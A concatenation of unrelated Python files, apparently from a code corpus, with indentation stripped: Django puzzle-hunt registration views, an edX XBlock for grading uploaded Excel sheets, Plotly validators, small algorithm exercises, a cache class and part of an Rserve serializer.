comparison_operator_has_simple_value = (
predicate_name not in COMPARISON_OPERATORS or
not isinstance(value, (tuple, list)))
return (inclusion_operator_has_list_value and
range_operator_has_tuple_value and
comparison_operator_has_simple_value)
predicates_strategy = (strategies.tuples(predicates_names_strategy,
filter_strategy)
.filter(predicates_has_correct_value))
predicates_lists_strategy = strategies.lists(predicates_strategy)
logical_operators_names_strategy = strategies.one_of(
strategies.just(operator)
for operator in LOGICAL_OPERATORS)
logical_operators_strategy = strategies.tuples(logical_operators_names_strategy,
predicates_lists_strategy)
filters_strategy = strategies.recursive(
predicates_strategy,
lambda child: strategies.tuples(logical_operators_names_strategy,
strategies.lists(child)))
|
from django.contrib.auth.decorators import login_required
from django.db.models.functions import Lower
from django.shortcuts import render
from django.contrib import messages
import random
import re
from .models import Hunt, Team
from .forms import PersonForm, ShibUserForm
import logging
logger = logging.getLogger(__name__)
def index(request):
""" Main landing page view, mostly static with the exception of hunt info """
curr_hunt = Hunt.objects.get(is_current_hunt=True)
team = curr_hunt.team_from_user(request.user)
return render(request, "index.html", {'curr_hunt': curr_hunt, 'team': team})
def previous_hunts(request):
""" A view to render the list of previous hunts, will show any hunt that is 'public' """
old_hunts = []
for hunt in Hunt.objects.all().order_by("hunt_number"):
if(hunt.is_public):
old_hunts.append(hunt)
return render(request, "previous_hunts.html", {'hunts': old_hunts})
def registration(request):
"""
The view that handles team registration. Mostly deals with creating the team object from the
post request. The rendered page is nearly entirely static.
"""
curr_hunt = Hunt.objects.get(is_current_hunt=True)
team = curr_hunt.team_from_user(request.user)
if(request.method == 'POST' and "form_type" in request.POST):
if(request.POST["form_type"] == "new_team" and team is None):
if(curr_hunt.team_set.filter(team_name__iexact=request.POST.get("team_name")).exists()):
messages.error(request, "The team name you have provided already exists.")
elif(re.match(".*[A-Za-z0-9].*", request.POST.get("team_name"))):
join_code = ''.join(random.choice("ACDEFGHJKMNPRSTUVWXYZ2345679") for _ in range(5))
team = Team.objects.create(team_name=request.POST.get("team_name"), hunt=curr_hunt,
location=request.POST.get("need_room"),
join_code=join_code)
request.user.person.teams.add(team)
logger.info("User %s created team %s" % (str(request.user), str(team)))
else:
messages.error(request,
"Your team name must contain at least one alphanumeric character.")
elif(request.POST["form_type"] == "join_team" and team is None):
team = curr_hunt.team_set.get(team_name=request.POST.get("team_name"))
if(len(team.person_set.all()) >= team.hunt.team_size):
messages.error(request, "The team you have tried to join is already full.")
team = None
elif(team.join_code.lower() != request.POST.get("join_code").lower()):
messages.error(request, "The team join code you have entered is incorrect.")
team = None
else:
request.user.person.teams.add(team)
logger.info("User %s joined team %s" % (str(request.user), str(team)))
elif(request.POST["form_type"] == "leave_team"):
request.user.person.teams.remove(team)
logger.info("User %s left team %s" % (str(request.user), str(team)))
if(team.person_set.count() == 0 and team.hunt.is_locked):
logger.info("Team %s was deleted because it was empty." % (str(team)))
team.delete()
team = None
messages.success(request, "You have successfully left the team.")
elif(request.POST["form_type"] == "new_location" and team is not None):
old_location = team.location
team.location = request.POST.get("team_location")
team.save()
logger.info("User %s changed the location for team %s from %s to %s" %
(str(request.user), str(team.team_name), old_location, team.location))
messages.success(request, "Location successfully updated")
elif(request.POST["form_type"] == "new_name" and team is not None and
not team.hunt.in_reg_lockdown):
if(curr_hunt.team_set.filter(team_name__iexact=request.POST.get("team_name")).exists()):
messages.error(request, "The team name you have provided already exists.")
else:
old_name = team.team_name
team.team_name = request.POST.get("team_name")
team.save()
logger.info("User %s renamed team %s to %s" %
(str(request.user), old_name, team.team_name))
messages.success(request, "Team name successfully updated")
if(team is not None):
return render(request, "registration.html",
{'registered_team': team, 'curr_hunt': curr_hunt})
else:
teams = curr_hunt.real_teams.order_by(Lower('team_name'))
return render(request, "registration.html",
{'teams': teams, 'curr_hunt': curr_hunt})
@login_required
def user_profile(request):
""" A view to handle user information update POST data and render the user information form. """
if request.method == 'POST':
uf = ShibUserForm(request.POST, instance=request.user)
pf = PersonForm(request.POST, instance=request.user.person)
if uf.is_valid() and pf.is_valid():
uf.save()
pf.save()
messages.success(request, "User information successfully updated.")
else:
context = {'user_form': uf, 'person_form': pf}
return render(request, "user_profile.html", context)
user_form = ShibUserForm(instance=request.user)
person_form = PersonForm(instance=request.user.person)
context = {'user_form': user_form, 'person_form': person_form}
return render(request, "user_profile.html", context)
|
people = [
{
'name': "Мария",
'interests': ['пътуване', 'танци', 'плуване', 'кино'],
'gender': "female",
},
{
'name': "Диана",
'interests': ['мода', 'спортна стрелба', 'четене', 'скандинавска поезия'],
'gender': "female",
},
{
'name': "Дарина",
'interests': ['танци', 'покер', 'история', 'софтуер'],
'gender': "female",
},
{
'name': "Лилия",
'interests': ['покер', 'автомобили', 'танци', 'кино'],
'gender': "female",
},
{
'name': "Галя",
'interests': ['пътуване', 'автомобили', 'плуване', 'баскетбол'],
'gender': "female",
},
{
'name': "Валерия",
'interests': ['плуване', 'покер', 'наука', 'скандинавска поезия'],
'gender': "female",
},
{
'name': "Ина",
'interests': ['кино', 'лов със соколи', 'пътуване', 'мода'],
'gender': "female",
},
{
'name': "Кирил",
'interests': ['баскетбол', 'автомобили', 'кино', 'наука'],
'gender': "male",
},
{
'name': "Георги",
'interests': ['автомобили', 'футбол', 'плуване', 'танци'],
'gender': "male",
},
{
'name': "Андрей",
'interests': ['футбол', 'скандинавска поезия', 'история', 'танци'],
'gender': "male",
},
{
'name': "Емил",
'interests': ['летене', 'баскетбол', 'софтуер', 'наука'],
'gender': "male",
},
{
'name': "Димитър",
'interests': ['футбол', 'лов със соколи', 'автомобили', 'баскетбол'],
'gender': "male",
},
{
'name': "Петър",
'interests': ['пътуване', 'покер', 'баскетбол', 'лов със соколи'],
'gender': "male",
},
{
'name': "Калоян",
'interests': ['история', 'покер', 'пътуване', 'автомобили'],
'gender': "male",
},
]
|
from utils import parse_date
import datetime
import unittest
class TestLateTube(unittest.TestCase):
def test_calculate_duration(self):
self.assertEqual(0, 0)
def test_parse_date(self):
dt = parse_date("19-Aug-2017", "19:33")
self.assertEqual(datetime.datetime(2017, 8, 19, 19, 33), dt)
def test_parse_date_morning(self):
dt = parse_date("19-Aug-2017", "09:33")
self.assertEqual(datetime.datetime(2017, 8, 19, 9, 33), dt)
if __name__ == '__main__':
unittest.main()
|
str = "print(3*(2-3^8))"#raw_input()
stack = []
queue = []
for index, c in enumerate(str):
print(index, c)
raw_input()
|
import _plotly_utils.basevalidators
class NameValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="name",
parent_name="heatmap.colorbar.tickformatstop",
**kwargs
):
super(NameValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs
)
|
import _plotly_utils.basevalidators
class TickmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="tickmode", parent_name="contour.colorbar", **kwargs
):
super(TickmodeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
implied_edits=kwargs.pop("implied_edits", {}),
values=kwargs.pop("values", ["auto", "linear", "array"]),
**kwargs
)
|
def check(s):
if( 'i' in s or 'o' in s or 'l' in s):
return 0
count = 0
flag = 0
char = ""
for i in range(len(s)-1):
if(s[i] == s[i+1] and s[i] not in char):
count += 1
char += s[i]
for i in range(len(s)-2):
if(s[i] == chr(ord(s[i+1])-1) and s[i+1] == chr(ord(s[i+2])-1)):
flag = 1
if(count >= 2 and flag == 1):
return 1
else:
return 0
def gen(s):
temp = ""
if( (ord(s[len(s)-1]) - 96) == 26 ):
temp += gen(s[:len(s)-1]) + "a"
else:
return (s[:len(s)-1] + chr(ord(s[len(s)-1])+1))
return temp
print gen("abcdefgh")
test = 0
string = "vzbxxyzz"
while(test == 0):
string = gen(string)
if(check(string)):
test = 1
print string
|
"""find the length of longest subsequence present in both of them.
A subsequence is a sequence that appears in the same relative order, but not necessarily contiguous.
Examples:
LCS for input Sequences “ABCDGH” and “AEDFHR” is “ADH” of length 3.
LCS for input Sequences “AGGTAB” and “GXTXAYB” is “GTAB” of length 4."""
def lcs(str1, str2):
m = len(str1)
n = len(str2)
matrix = [[0 for i in range(n+1)] for i in range(m+1)]
for i in range(1, m+1):
for j in range(1, n+1):
if i == 0 or j == 0:
matrix[i][j] = 0
elif str1[i-1] == str2[j-1]:
matrix[i][j] = 1 + matrix[i-1][j-1]
else:
matrix[i][j] = max(matrix[i-1][j], matrix[i][j-1])
index = matrix[m][n]
res = [""] * index
i = m
j = n
while i > 0 and j > 0:
if str1[i-1] == str2[j-1]:
res[index-1] = str1[i-1]
i -= 1
j -= 1
index -= 1
elif matrix[i-1][j] > matrix[i][j-1]:
i -= 1
else:
j -= 1
return res
if __name__ == '__main__':
X = "AGGTAB"
Y = "GXTXAYB"
str = ''.join(lcs(X, Y))
print("Length of longest common subsequence is:", len(str),"\nAnd the subsequence is:", str)
|
import datetime
import hashlib
import json
import logging
import mimetypes
import os
import pkg_resources
import pytz
import grades
from functools import partial
from courseware.models import StudentModule
from django.core.exceptions import PermissionDenied
from django.core.files import File
from django.core.files.storage import default_storage
from django.conf import settings
from django.template import Context, Template
from student.models import user_by_anonymous_id
from submissions import api as submissions_api
from submissions.models import StudentItem as SubmissionsStudent
from webob.response import Response
from xblock.core import XBlock
from xblock.exceptions import JsonHandlerError
from xblock.fields import Dict, Scope, String, Float, Integer
from xblock.fragment import Fragment
from file_storage import save_file
import storage
from xmodule.util.duedate import get_extended_due_date
from grader import *
log = logging.getLogger(__name__)
BLOCK_SIZE = 8 * 1024
FORCE_EVAL_EVERYTIME = True
IMAGEDIFF_ROOT = "/edx/var/edxapp/media/"
def reify(meth):
def getter(inst):
value = meth(inst)
inst.__dict__[meth.__name__] = value
return value
return property(getter)
class ExcelSheetAssessmentXBlock(XBlock):
has_score = True
icon_class = 'problem'
STUDENT_FILEUPLOAD_MAX_SIZE = 4 * 1000 * 1000 # 4 MB
display_name = String(
display_name = 'Block Type',
default='Excel Sheet Assessment', scope=Scope.settings,
help="This is the question title."
)
question = String(
display_name = "Question text",
default='Your Question Statement appears here', scope=Scope.settings,
help="This is the question text that is shown to the student alongside the "
"uploaded question file."
)
title = String(
display_name = "Question title",
default='Your Question Title appears here', scope=Scope.settings,
help="This is the question title that appears at the top of the problem"
)
weight = Float(
display_name="Problem Weight",
help=("Defines the number of points each problem is worth. "
"If the value is not set, the problem is worth the sum of the "
"option point values."),
default=1.0,
values={"min": 1, "step": .1},
scope=Scope.settings
)
points = Integer(
display_name = "Score to be graded out of",
help = "The minimum score to be obtained so as to be awarded full credit",
default=100,
scope=Scope.settings
)
score = Integer(
display_name="Score assigned by autograder",
help = "Absolute score assigned by the autograder",
default=None,
scope=Scope.user_state
)
attempts = Integer(
display_name = "No of attempts",
help=("Number of attempts taken by the student on this problem."),
default=0,
scope=Scope.user_state)
max_attempts = Integer(
display_name=("Maximum attempts permitted"),
help=("Defines the number of times a student can try to answer this problem. "
"If the value is not set, infinite attempts are allowed."),
scope=Scope.settings
)
raw_answer=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded assignment"),
scope=Scope.user_state
)
raw_question=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded question"),
scope=Scope.settings
)
raw_solution=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded solution"),
scope=Scope.settings
)
def max_score(self):
return self.points
@reify
def block_id(self):
return self.scope_ids.usage_id
def get_submission(self):
"""
Returns the raw_answer dictionary
"""
submissions = self.raw_answer
if submissions is not None:
return {
"answer": self.raw_answer
}
def get_question(self):
"""
Returns the raw_question dictionary
"""
question = self.raw_question
if question is not None:
return {
"question": self.raw_question
}
def get_solution(self):
"""
Returns the raw_solution dictionary
"""
solution = self.raw_solution
if solution is not None:
return {
"solution": self.raw_solution
}
def student_view(self, context=None):
# pylint: disable=no-member
"""
Student view, renders the content of LMS
"""
log.info("Studnent view called")
log.info(self)
context = {
"student_state": json.dumps(self.student_state()),
"id": self.location.name.replace('.', '_'),
"max_file_size": getattr(
settings, "STUDENT_FILEUPLOAD_MAX_SIZE",
self.STUDENT_FILEUPLOAD_MAX_SIZE
)
}
fragment = Fragment()
fragment.add_content(
render_template(
'templates/assignment/show.html',
context
)
)
fragment.add_javascript(_resource("static/js/src/agea.js"))
fragment.initialize_js('ExcelSheetAssessmentXBlock')
return fragment
def student_state(self):
"""
Returns the context for rendering the student view in the form of a dictionary
"""
submission = self.get_submission()
if submission:
uploaded_submission = submission.get("answer").get("filename", None)
if uploaded_submission:
uploaded = {"filename": submission['answer']['filename']}
else:
uploaded = None
else:
uploaded = None
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
quploaded = {"filename": submission['question']['filename']}
else:
quploaded = None
else:
quploaded = None
submission = self.get_solution()
if submission:
uploaded_submission = submission.get("solution").get("filename", None)
if uploaded_submission:
suploaded = {"filename": submission['solution']['filename']}
else:
suploaded = None
else:
suploaded = None
return {
"display_name": self.title,
"question":self.question,
"uploaded": uploaded,
"quploaded":quploaded,
"suploaded":suploaded,
"raw_answer":self.raw_answer,
"raw_question":self.raw_question,
"score": self.score,
"weight":self.weight,
"attempts": self.attempts,
"max_attempts": self.max_attempts,
}
def studio_state(self):
"""
Returns the context for rendering the studio view in the form of a dictionary
"""
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
quploaded = {"filename": submission['question']['filename']}
else:
quploaded = None
else:
quploaded = None
submission = self.get_solution()
if submission:
uploaded_submission = submission.get("solution").get("filename", None)
if uploaded_submission:
suploaded = {"filename": submission['solution']['filename']}
else:
suploaded = None
else:
suploaded = None
return {
"display_name": self.title,
"question":self.question,
"uploaded": quploaded,
"suploaded":suploaded,
"raw_question" : self.raw_question,
"solutionUploaded": suploaded,
"raw_soluion": self.raw_solution,
"weight":self.weight
}
def studio_view(self, context=None):
"""
Studio view, renders the content of CMS
"""
log.info("Studio view called")
log.info(self)
cls = type(self)
def none_to_empty(data):
return data if data is not None else ''
edit_fields = (
(field, none_to_empty(getattr(self, field.name)), validator)
for field, validator in (
(cls.title, 'string'),
(cls.question,'string'),
(cls.points, 'number'),
(cls.weight, 'number'),
(cls.max_attempts, 'number')
)
)
context = {
"studio_state": json.dumps(self.studio_state()),
"id": self.location.name.replace('.', '_'),
"max_file_size": getattr(
settings, "STUDENT_FILEUPLOAD_MAX_SIZE",
self.STUDENT_FILEUPLOAD_MAX_SIZE,
),
'fields': edit_fields
}
fragment = Fragment()
fragment.add_content(
render_template(
'templates/assignment/edit.html',
context
)
)
fragment.add_css(_resource("static/css/agea.css"))
fragment.add_javascript(_resource("static/js/src/studio.js"))
fragment.initialize_js('ExcelSheetAssessmentXBlock')
return fragment
@XBlock.json_handler
def save_agea(self, data, suffix=''):
"""
Persist block data when updating settings in studio.
"""
self.title = data.get('title', self.title)
self.question = data.get('question', self.question)
self.raw_question = data.get('raw_question',self.raw_question)
self.raw_solution= data.get('raw_solution',self.raw_solution)
self.max_attempts = data.get('max_attempts', self.max_attempts)
# Validate points before saving
points = data.get('points', self.points)
# Check that we are an int
try:
points = int(points)
except ValueError:
raise JsonHandlerError(400, '"Score to be graded out of" must be an integer')
# Check that we are positive
if points < 0:
raise JsonHandlerError(400, '"Score to be graded out of" must be a positive integer')
self.points = points
# Validate weight before saving
weight = data.get('weight', self.weight)
# Check that weight is a float.
if weight:
try:
weight = float(weight)
except ValueError:
raise JsonHandlerError(400, 'Weight must be a decimal number')
# Check that we are positive
if weight < 0:
raise JsonHandlerError(
400, 'Weight must be a positive decimal number'
)
self.weight = weight
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
question = self._question_storage_path(self.raw_question['sha1'], self.raw_question['filename'])
question = os.path.join(IMAGEDIFF_ROOT, question)
actual=total_marks(question)
if actual < points:
raise JsonHandlerError(400, '"Score to be graded out of" should be less than equal to the maximum attainable score for the question paper you uploaded')
self.save()
log.info(self)
#self.weight = data.get('weight', self.max_score())
@XBlock.handler
def upload_assignment(self, request, suffix=''):
"""
Uploads the student file on local disk, then calls storage api, grades the file, and then deletes the file from local disk
"""
log.info("upload_assignment called")
upload = request.params['assignment']
sha1 = _get_sha1(upload.file)
log.info(type(upload.file))
answer = {
"sha1": sha1,
"filename": upload.file.name,
"mimetype": mimetypes.guess_type(upload.file.name)[0]
}
self.raw_answer = answer
path = self._file_storage_path(sha1, upload.file.name)
log.info("upload1-----------------------------------------------")
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
log.info("saving the file onto local store")
save_file(path, File(upload.file))
file_exists=True
try:
storage.store_data(str(self.course_id), str(self.xmodule_runtime.anonymous_student_id), str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
except PersonValueError:
log.info("storage api upload failed:")
log.info("peson argument cant be an empty string")
except DepartmentValueError:
log.info("storage api upload failed:")
log.info("department argument cant be an empty string")
except QualifierValueError:
log.info("storage api upload failed:")
log.info("qualifier argument cant be an empty string")
except BucketValueError:
log.info("storage api upload failed:")
log.info("invalid bucket key argument")
except S3ValueError:
log.info("storage api upload failed:")
log.info("invalid S3 credentials")
except SocketValueError:
log.info("storage api upload failed:")
log.info("invalid host")
log.info("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$")
log.info(self)
self.grade_this_guy()
if self.score != -1:
self.attempts += 1
os.remove(IMAGEDIFF_ROOT + path)
return Response(json_body=self.student_state())
@XBlock.handler
def upload_question(self, request, suffix=''):
"""
Uploads the question file on local disk, then calls storage api
"""
log.info("upload_question called")
qupload = request.params['qassignment']
sha1 = _get_sha1(qupload.file)
question = {
"sha1": sha1,
"filename": qupload.file.name,
"mimetype": mimetypes.guess_type(qupload.file.name)[0]
}
self.raw_question = question
path = self._question_storage_path(sha1, qupload.file.name)
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
save_file(path, File(qupload.file))
file_exists=True
log.info("File uploaded locally")
try:
storage.store_data(str(self.course_id), "question", str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
except PersonValueError:
log.info("storage api upload failed:")
log.info("peson argument cant be an empty string")
except DepartmentValueError:
log.info("storage api upload failed:")
log.info("department argument cant be an empty string")
except QualifierValueError:
log.info("storage api upload failed:")
log.info("qualifier argument cant be an empty string")
except BucketValueError:
log.info("storage api upload failed:")
log.info("invalid bucket key argument")
except S3ValueError:
log.info("storage api upload failed:")
log.info("invalid S3 credentials")
except SocketValueError:
log.info("storage api upload failed:")
log.info("invalid host")
self.save()
return Response(json_body=self.studio_state())
@XBlock.handler
def upload_solution(self, request, suffix=''):
"""
Uploads the solution file on local disk, then calls storage api
"""
upload = request.params['sassignment'] #TODO:change name
sha1 = _get_sha1(upload.file)
solution = {
"sha1": sha1,
"filename": upload.file.name,
"mimetype": mimetypes.guess_type(upload.file.name)[0]
}
# del xbl
#student_id = self.student_submission_id()
#add xbla update IITBsub
self.raw_solution = solution
# IITBombayX zip changes
#submis = submissions_api.create_submission(student_id, answer)
path = self._solution_storage_path(sha1, upload.file.name)
log.info("Solution Upload Path" + path)
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
save_file(path, File(upload.file))
file_exists=True
try:
storage.store_data(str(self.course_id), "solution", str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
except PersonValueError:
log.info("storage api upload failed:")
log.info("peson argument cant be an empty string")
except DepartmentValueError:
log.info("storage api upload failed:")
log.info("department argument cant be an empty string")
except QualifierValueError:
log.info("storage api upload failed:")
log.info("qualifier argument cant be an empty string")
except BucketValueError:
log.info("storage api upload failed:")
log.info("invalid bucket key argument")
except S3ValueError:
log.info("storage api upload failed:")
log.info("invalid S3 credentials")
except SocketValueError:
log.info("storage api upload failed:")
log.info("invalid host")
self.save()
return Response(json_body=self.studio_state())
@XBlock.handler
def download_assignment(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the student's answer file from storage api and then returns a response
"""
try:
file_descriptor = storage.access_data(str(self.course_id),str(self.xmodule_runtime.anonymous_student_id), str(self.location.block_id))
log.info("download through storage api successful")
except PersonValueError:
log.info("storage api download failed:")
log.info("peson argument cant be an empty string")
except DepartmentValueError:
log.info("storage api download failed:")
log.info("department argument cant be an empty string")
except QualifierValueError:
log.info("storage api download failed:")
log.info("qualifier argument cant be an empty string")
except BucketValueError:
log.info("storage api download failed:")
log.info("invalid bucket key argument")
except S3ValueError:
log.info("storage api download failed:")
log.info("invalid S3 credentials")
except SocketValueError:
log.info("storage api download failed:")
log.info("invalid host")
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_answer["mimetype"],
content_disposition="attachment; filename=" + self.raw_answer["filename"].encode('utf-8'))
@XBlock.handler
def download_question(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the question file from storage api and then returns a response
"""
log.info("download_question called")
try:
file_descriptor = storage.access_data(str(self.course_id), "question", str(self.location.block_id))
log.info("file_descriptor is:")
log.info(file_descriptor)
if not file_descriptor:
log.info("storage api download failed:")
log.info("file doesn't exist")
return
log.info("download through storage api successful")
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_question["mimetype"],
content_disposition="attachment; filename=" + self.raw_question["filename"].encode('utf-8'))
except storage.PersonValueError:
log.info("storage api download failed:")
log.info("peson argument cant be an empty string")
return
except DepartmentValueError:
log.info("storage api download failed:")
log.info("department argument cant be an empty string")
return
except QualifierValueError:
log.info("storage api download failed:")
log.info("qualifier argument cant be an empty string")
return
except BucketValueError:
log.info("storage api download failed:")
log.info("invalid bucket key argument")
return
except S3ValueError:
log.info("storage api download failed:")
log.info("invalid S3 credentials")
return
except SocketValueError:
log.info("storage api download failed:")
log.info("invalid host")
return
@XBlock.handler
def download_solution(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the solution file from storage api and then returns a response
"""
log.info("download_solution called")
try:
file_descriptor = storage.access_data(str(self.course_id), "solution", str(self.location.block_id))
log.info("file_descriptor is:")
log.info(file_descriptor)
if not file_descriptor:
log.info("storage api download failed:")
log.info("file doesn't exist")
return
log.info("download through storage api successful")
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_solution["mimetype"],
content_disposition="attachment; filename=" + self.raw_solution["filename"].encode('utf-8'))
except storage.PersonValueError:
log.info("storage api download failed:")
log.info("peson argument cant be an empty string")
return
except DepartmentValueError:
log.info("storage api download failed:")
log.info("department argument cant be an empty string")
return
except QualifierValueError:
log.info("storage api download failed:")
log.info("qualifier argument cant be an empty string")
return
except BucketValueError:
log.info("storage api download failed:")
log.info("invalid bucket key argument")
return
except S3ValueError:
log.info("storage api download failed:")
log.info("invalid S3 credentials")
return
except SocketValueError:
log.info("storage api download failed:")
log.info("invalid host")
return
def grade_this_guy(self):
"""
Generates the path for the three files to be compared, passes them to the grader function, popuates the
score field, runtime.publish-es the grades so that it shows up in the progress page
"""
log.info("Function has been called")
answer = self._file_storage_path(self.raw_answer['sha1'], self.raw_answer['filename'])
question = self._question_storage_path(self.raw_question['sha1'], self.raw_question['filename'])
solution = self._solution_storage_path(self.raw_solution['sha1'], self.raw_solution['filename'])
answer = os.path.join(IMAGEDIFF_ROOT, answer)
question = os.path.join(IMAGEDIFF_ROOT, question)
solution = os.path.join(IMAGEDIFF_ROOT, solution)
self.score = grade(question, answer, solution)
if self.score > self.points:
self.score = self.points
self.points=float(self.max_score())
self.save()
if self.score >= 0:
self.runtime.publish(self, 'grade',{ 'value': self.score, 'max_value':self.max_score(),})
log.info("runtime.publish-ed")
self.save()
return Response(json_body=self.student_state())
def _file_storage_path(self, sha1, filename):
"""
Returns the local path where the student's uploaded file is saved
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'{student_id}/{sha1}{ext}'.format(
student_id = self.xmodule_runtime.anonymous_student_id,
loc=self.location,
sha1=sha1,
ext=os.path.splitext(filename)[1]
)
)
return path
def _question_storage_path(self, sha1, filename):
"""
Returns the local path of the question file uploaded by the instructor
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'static/question/{sha1}{ext}'.format(
sha1 = sha1,
loc=self.location,
ext=os.path.splitext(filename)[1]
)
)
return path
def _solution_storage_path(self, sha1, filename):
"""
Returns the local path of the solution file uploaded by the instructor
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'static/solution/{sha1}{ext}'.format(
sha1 = sha1,
loc=self.location,
ext=os.path.splitext(filename)[1]
)
)
return path
def _get_sha1(file_descriptor):
"""
Get file hex digest (fingerprint).
"""
sha1 = hashlib.sha1()
for block in iter(partial(file_descriptor.read, BLOCK_SIZE), ''):
sha1.update(block)
file_descriptor.seek(0)
return sha1.hexdigest()
def _resource(path): # pragma: NO COVER
"""
Handy helper for getting resources from our kit.
"""
data = pkg_resources.resource_string(__name__, path)
return data.decode("utf8")
def load_resource(resource_path): # pragma: NO COVER
"""
Gets the content of a resource
"""
resource_content = pkg_resources.resource_string(__name__, resource_path)
return unicode(resource_content)
def render_template(template_path, context=None): # pragma: NO COVER
"""
Evaluate a template by resource path, applying the provided context.
"""
if context is None:
context = {}
template_str = load_resource(template_path)
template = Template(template_str)
return template.render(Context(context))
def require(assertion):
"""
Raises PermissionDenied if assertion is not true.
"""
if not assertion:
raise PermissionDenied
def workbench_scenario():
return[
("ExcelSheetAssessmentXBlock", """agea"""), ]
|
"""
AVWX Test Suite
"""
import sys
from pathlib import Path
sys.path.insert(0, Path(__file__).parent.joinpath(".."))
|
class Cache(object):
def __init__(self, max=1000):
self.d = {}
self.l = []
self.max = max
def put(self, k, v):
self.d[k] = v
self.l.append(k)
while (len(self.l) > self.max):
kdel = self.l[0]
del self.l[0]
del self.d[kdel]
def get(self, k):
try:
return self.d[k]
except:
return None
def exists(self, k):
return k in self.d
|
"""
Serializer class to convert Python objects into a binary data stream for sending them to Rserve.
"""
__all__ = ['reval', 'rassign', 'rSerializeResponse']
import struct, os, cStringIO, socket
import numpy
import rtypes
from misc import FunctionMapper
from rexceptions import RSerializationError
from taggedContainers import TaggedList, TaggedArray
DEBUG = False
def padLen4(aString):
"""Calculate how many additional bytes a given string needs to have a length of a multiple of 4"""
l = len(aString)
return 4-divmod(l, 4)[1]
def padString4(aString, padByte='\0'):
"""return a given string padded with zeros at the end to make its length be a multiple of 4"""
return aString + padLen4(aString) * padByte
class RSerializer(object):
"""
Class to to serialize Python objects into a binary data stream for sending them to Rserve.
Depending on 'commandType' given to __init__ the resulting binary string can be used to send a command, to assign
a variable in Rserve, or to reply to a request received from Rserve.
"""
serializeMap = {}
fmap = FunctionMapper(serializeMap)
#
def __init__(self, commandType, fp=None):
if isinstance(fp, socket._socketobject):
self._orig_fp = fp.makefile()
self._fp = cStringIO.StringIO()
elif not fp:
self._fp = fp or cStringIO.StringIO()
self._orig_fp = None
else:
self._fp = self._orig_fp = fp
self._dataSize = 0
self._writeHeader(commandType)
def _getRetVal(self):
if self._orig_fp is self._fp:
return None
elif not self._orig_fp:
return self._fp.getvalue()
else:
# i.e. socket: write result of _fp into socket-fp
self._orig_fp.write(self._fp.getvalue())
self._orig_fp.flush()
return None
def _writeHeader(self, commandType):
# Set length to zero initially, will be fixed in _finalizerHeader() when msg size is determined:
msg_length_lower = msg_length_higher = 0
data_offset = 0
header = struct.pack('<IIII', commandType, msg_length_lower, data_offset, msg_length_higher)
if DEBUG:
print 'Writing header: %d bytes: %s' % (len(header), repr(header))
self._fp.write(header)
def finalize(self):
# and finally we correctly set the length of the entire data package (in bytes) minus header size:
# dataSize = self._fp.tell() - rtypes.RHEADER_SIZE
# TODO: Also handle data larger than 2**32 (user upper part of message length!!)
assert self._dataSize < 2**32, 'data larger than 2**32 not yet implemented'
self._fp.seek(4)
if DEBUG:
print 'writing size of header: %2d' % self._dataSize
self._fp.write(struct.pack('<I', self._dataSize))
return self._getRetVal()
def _writeDataHeader(self, rTypeCode, length):
'''
A data header consists of 4 bytes:
[1] rTypeCode
[2-4] length of data block (3 bytes!!!)
'''
self._fp.write(struct.pack('<Bi', rTypeCode, length)[:4])
def serialize(self, o, dtTypeCode=rtypes.DT_SEXP):
# Here the data typecode (DT_* ) of the entire message is written, with its length.
# Then the actual data itself is written out.
if dtTypeCode == rtypes.DT_STRING:
paddedString = padString4(o)
length = len(paddedString)
self._writeDataHeader(dtTypeCode, length)
self._fp.write(paddedString)
elif dtTypeCode == rtypes.DT_INT:
length = 4
self._writeDataHeader(dtTypeCode, length)
self._fp.write(struct.pack('<i', o))
elif dtTypeCode == rtypes.DT_SEXP:
startPos = self._fp.tell()
self._fp.write('\0\0\0\0')
length = self._serializeExpr(o)
self._fp.seek(startPos)
self._writeDataHeader(dtTypeCode, length)
else:
raise NotImplementedError('no support for DT-type %x' % dtTypeCode)
self._dataSize += length + 4
def _serializeExpr(self, o, rTypeHint=None):
if not rTypeHint:
if isinstance(o, numpy.ndarray):
if o.dtype.type == numpy.int64:
o = o.astype(numpy.int32)
rTypeHint = rtypes.numpyMap[o.dtype.type] #o.dtype.type
else:
rTypeHint = type(o)
try:
